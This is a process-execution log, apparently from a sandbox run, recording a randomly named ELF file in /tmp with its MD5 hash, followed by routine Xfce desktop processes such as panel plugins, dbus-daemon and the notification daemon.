                            Start time (UTC):13:37:57
                            Start date (UTC):10/06/2024
                            Path:/tmp/s8y4CBbFHW.elf
                            Arguments:-
                            File size:4139976 bytes
                            MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                            Start time (UTC):13:37:57
                            Start date (UTC):10/06/2024
                            Path:/tmp/s8y4CBbFHW.elf
                            Arguments:-
                            File size:4139976 bytes
                            MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                            Start time (UTC):13:37:57
                            Start date (UTC):10/06/2024
                            Path:/tmp/s8y4CBbFHW.elf
                            Arguments:-
                            File size:4139976 bytes
                            MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                            Start time (UTC):13:37:57
                            Start date (UTC):10/06/2024
                            Path:/tmp/s8y4CBbFHW.elf
                            Arguments:-
                            File size:4139976 bytes
                            MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                            Start time (UTC):13:37:57
                            Start date (UTC):10/06/2024
                            Path:/tmp/s8y4CBbFHW.elf
                            Arguments:-
                            File size:4139976 bytes
                            MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                            Start time (UTC):13:37:57
                            Start date (UTC):10/06/2024
                            Path:/tmp/s8y4CBbFHW.elf
                            Arguments:-
                            File size:4139976 bytes
                            MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                            Start time (UTC):13:38:03
                            Start date (UTC):10/06/2024
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):13:38:03
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):13:38:03
                            Start date (UTC):10/06/2024
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):13:38:03
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):13:38:03
                            Start date (UTC):10/06/2024
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):13:38:03
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):13:38:03
                            Start date (UTC):10/06/2024
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):13:38:03
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):13:38:11
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:-
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):13:38:11
                            Start date (UTC):10/06/2024
                            Path:/usr/sbin/xfpm-power-backlight-helper
                            Arguments:/usr/sbin/xfpm-power-backlight-helper --get-max-brightness
                            File size:14656 bytes
                            MD5 hash:3d221ad23f28ca3259f599b1664e2427

                            Start time (UTC):13:38:04
                            Start date (UTC):10/06/2024
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):13:38:04
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):13:38:04
                            Start date (UTC):10/06/2024
                            Path:/usr/bin/xfce4-panel
                            Arguments:-
                            File size:375768 bytes
                            MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                            Start time (UTC):13:38:04
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                            File size:35136 bytes
                            MD5 hash:ac0b8a906f359a8ae102244738682e76

                            Start time (UTC):13:38:11
                            Start date (UTC):10/06/2024
                            Path:/usr/bin/dbus-daemon
                            Arguments:-
                            File size:249032 bytes
                            MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

                            Start time (UTC):13:38:11
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
                            File size:112880 bytes
                            MD5 hash:4c7a0d6d258bb970905b19b84abcd8e9

                            Start time (UTC):13:38:15
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/systemd/systemd
                            Arguments:-
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Start time (UTC):13:38:15
                            Start date (UTC):10/06/2024
                            Path:/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
                            Arguments:/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
                            File size:112872 bytes
                            MD5 hash:eee956f1b227c1d5031f9c61223255d1